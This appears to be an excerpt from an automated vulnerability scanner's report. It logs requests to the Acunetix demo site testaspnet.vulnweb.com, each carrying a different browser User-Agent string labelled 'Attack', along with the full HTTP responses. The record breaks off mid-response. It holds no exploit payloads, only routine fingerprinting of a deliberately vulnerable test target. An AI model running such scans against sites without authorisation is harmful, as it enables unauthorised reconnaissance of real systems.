Evidence
Show / hide Request and Response
Request Header - size: 195 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ulvxgh45rekc0eulio5i1ibd; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Show / hide Request and Response
Request Header - size: 261 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0 Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=lahslg45zkfvpfzi4k3z0sqc; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Show / hide Request and Response
Request Header - size: 248 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=bsvog2ildpcd3n45w0hbtuvp; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:16 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> 